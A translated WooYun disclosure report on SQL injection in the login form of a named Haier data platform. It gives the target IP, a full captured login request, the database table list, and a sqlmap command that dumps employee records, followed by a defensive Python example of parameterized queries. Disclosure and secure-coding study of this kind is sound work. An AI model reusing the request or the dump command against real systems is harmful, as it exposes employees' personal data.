
Vulnerability summary

Defect ID: wooyun-2016-0209304

Title: SQL injection in a Haier Group system (leaks 100,000 employee records: names, employee IDs, mobile numbers, departments, internal email addresses)

Affected vendor: Haier Group

Author: 肉包包

Submitted: 2016-05-16 19:22

Fixed: 2016-07-01 09:40

Published: 2016-07-01 09:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-05-16: details sent to the vendor, awaiting vendor handling
2016-05-17: vendor confirmed; details disclosed to the vendor only
2016-05-27: details disclosed to core white hats and domain experts
2016-06-06: details disclosed to regular white hats
2016-06-16: details disclosed to intern white hats
2016-07-01: details disclosed to the public

Brief description:

SQL injection in a Haier Group system (leaks 100,000 employee records: names, employee IDs, mobile numbers, departments, internal email addresses)

Details:

Haier Information Platform (information-to-person data visualization system)
http://27.223.99.106:3000/login/log?next=%2F

[Screenshot: he1.png]


The uname parameter of the login request is vulnerable to SQL injection:

POST /login/log?next=%2F HTTP/1.1
Host: 27.223.99.106:3000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://27.223.99.106:3000/login/log?next=%2F
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229fba818f4569021e9902e3817561aee7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A46.0%29+Gecko%2F20100101+Firefox%2F46.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1463375397%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dad271c28f09793bbbe4559883da794a536f88de6; PHPSESSID=sqn7nb2oupcg98ecu46q2vvad0
Connection: keep-alive
uname=admin&password=123456&commit=%E7%99%BB%E5%BD%95


Four databases:

[Screenshot: he2.png]



+--------------------------------+
| ODSXWPT_V_HRIT_XWPT_INFO |
| Sheet1 |
| USER_INFO |
| VDATA_CST_HR_EMP_BASE |
| a1 |
| a2 |
| a3 |
| a4 |
| db1 |
| db2 |
| t_idm_user |
| temp_userxw |
| vdata_alarm |
| vdata_alarm_log |
| vdata_alarm_max_time |
| vdata_alarm_msg |
| vdata_alarm_options |
| vdata_alarm_org |
| vdata_alarm_role |
| vdata_alarm_temp |
| vdata_alarm_template |
| vdata_alarm_value |
| vdata_brand |
| vdata_channel |
| vdata_child_industry |
| vdata_collection |
| vdata_dashboard_action |
| vdata_dashboard_group |
| vdata_dashboardgroup_post |
| vdata_dashborad |
| vdata_dashborad_0514 |
| vdata_dashbord_0515 |
| vdata_datachart_new |
| vdata_datachart_new_0514 |
| vdata_datasource |
| vdata_datasource_auth |
| vdata_datasource_bak_0330 |
| vdata_datasource_config |
| vdata_datasource_folder |
| vdata_datasource_user |
| vdata_dimensions |
| vdata_dimensions_column |
| vdata_grid_info |
| vdata_grid_org |
| vdata_index |
| vdata_index_count |
| vdata_industry |
| vdata_kpi_displaydef |
| vdata_log |
| vdata_micro_member |
| vdata_mirror_dashboard_group |
| vdata_mirror_dashboard_org |
| vdata_mirror_dashboard_role |
| vdata_mirror_dashborad_chart |
| vdata_monitors |
| vdata_new_log_all |
| vdata_new_log_all_m |
| vdata_new_log_all_month |
| vdata_new_log_all_month_m |
| vdata_new_log_class |
| vdata_new_log_day |
| vdata_new_log_dg_view |
| vdata_new_log_master_day |
| vdata_new_log_master_month |
| vdata_new_log_month |
| vdata_new_log_org_day |
| vdata_new_log_org_month |
| vdata_new_log_time_day |
| vdata_new_log_time_month |
| vdata_new_log_totle |
| vdata_new_log_wgxw |
| vdata_new_org_day_rate |
| vdata_new_org_month_rate |
| vdata_org |
| vdata_org_class |
| vdata_org_class_disConfig |
| vdata_org_class_disConfig_back |
| vdata_org_copy |
| vdata_org_dg |
| vdata_org_dic |
| vdata_org_index |
| vdata_org_moblie_menu |
| vdata_org_relation |
| vdata_org_user |
| vdata_personal_folder |
| vdata_platform |
| vdata_post |
| vdata_recent_view |
| vdata_role |
| vdata_role_org |
| vdata_role_org_folder |
| vdata_role_topic |
| vdata_search_history |
| vdata_small_v_platform |
| vdata_sys_enum |
| vdata_sys_folder |
| vdata_time_dic_bak2 |
| vdata_time_haier_dic |
| vdata_tools_role_org |
| vdata_user |
| vdata_user_brand |
| vdata_user_channel |
| vdata_user_industry |
| vdata_user_org |
| vdata_user_post |
| vdata_user_role |
| vdata_v_alarm |
| vdata_v_dashboard_group |
| vdata_v_dashboard_group_mirror |
| vdata_v_dashboard_personal |
| vdata_v_index |
| vdata_v_org_wg |
| vdata_v_platform |
| vdata_v_role_org_folder |
| vdata_v_user |
| vdata_v_user_dept_info |
| vdata_v_user_org |
| vdata_v_xw_index |
+--------------------------------+


100,000 records

[Screenshot: he3.png]


[Screenshot: he4.png]


Thirty sample rows were extracted. (Deleted after the report was submitted.)

[Screenshot: he5.png]


Proof of vulnerability:

[Screenshot: he7.png]


sqlmap.py -r 1.txt -D "vdata" -T "vdata_user" --dump  --start 10030 --stop 10060


[Screenshot: he6.png]


(All data was deleted after the report was submitted.)

Fix recommendation:

Fix the injection.
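The report's fix section does not say how. As an added illustration (not part of the original report and not the platform's own code), the following Python contrasts the defect pattern the report describes in the login handler, a username spliced into the SQL text, with the parameterized form that removes it. The table name vdata_user is taken from the report; the column names, the sample rows and the in-memory SQLite database are constructed for this example, and the helper names (vulnerable_login, safe_login, login_handles_quote) are hypothetical.

```python
import sqlite3

# Constructed sample data standing in for the platform's vdata_user table.
# Passwords are kept in clear text here only so the SQL handling stays
# visible; a real system stores a salted password hash, never the password.
SAMPLE_USERS = [
    ("admin", "correct horse battery staple", "IT"),
    ("zhangsan", "hunter2", "HR"),
]


def build_db():
    """Create an in-memory database with the constructed vdata_user rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE vdata_user (uname TEXT, password TEXT, dept TEXT)")
    conn.executemany("INSERT INTO vdata_user VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(conn, uname, password):
    """The pattern behind the report: request fields pasted into SQL text.

    Anything the client sends in uname becomes part of the query grammar,
    which is exactly what lets a tool such as sqlmap enumerate the database.
    """
    sql = (
        "SELECT uname, dept FROM vdata_user WHERE uname = '%s' AND password = '%s'"
        % (uname, password)
    )
    return conn.execute(sql).fetchone()


def safe_login(conn, uname, password):
    """The fix: bind values with placeholders.

    The SQL text is fixed at development time; the driver passes uname and
    password to the engine as data, so they can never alter the statement.
    """
    sql = "SELECT uname, dept FROM vdata_user WHERE uname = ? AND password = ?"
    return conn.execute(sql, (uname, password)).fetchone()


def login_handles_quote(login):
    """Check whether a login function treats a quote in the username as data.

    A legitimate username containing an apostrophe must simply fail to match;
    if it instead produces a SQL syntax error, the username is being parsed
    as part of the statement, which is the tell-tale of injectable code.
    """
    conn = build_db()
    try:
        return login(conn, "o'brien", "x") is None
    except sqlite3.OperationalError:
        return False


if __name__ == "__main__":
    db = build_db()
    print("safe login, valid credentials:", safe_login(db, "admin", "correct horse battery staple"))
    print("safe login handles quote:", login_handles_quote(safe_login))
    print("vulnerable login handles quote:", login_handles_quote(vulnerable_login))
```

The ci_session cookie in the captured request suggests the application is built on CodeIgniter; there the equivalent of safe_login is the query-binding form, `$this->db->query("... WHERE uname = ?", array($uname))`, or the Query Builder methods, which escape values for you. Whichever framework is in use, the fix is the same: every value that originates in the request reaches the database as a bound parameter, never as part of the SQL string.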

Copyright notice: when reposting, please credit the source: 肉包包@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2016-05-17 09:39

Vendor reply:

Thanks to the white hat for the testing and the heads-up; staff have been assigned to handle it.

Latest status:

None yet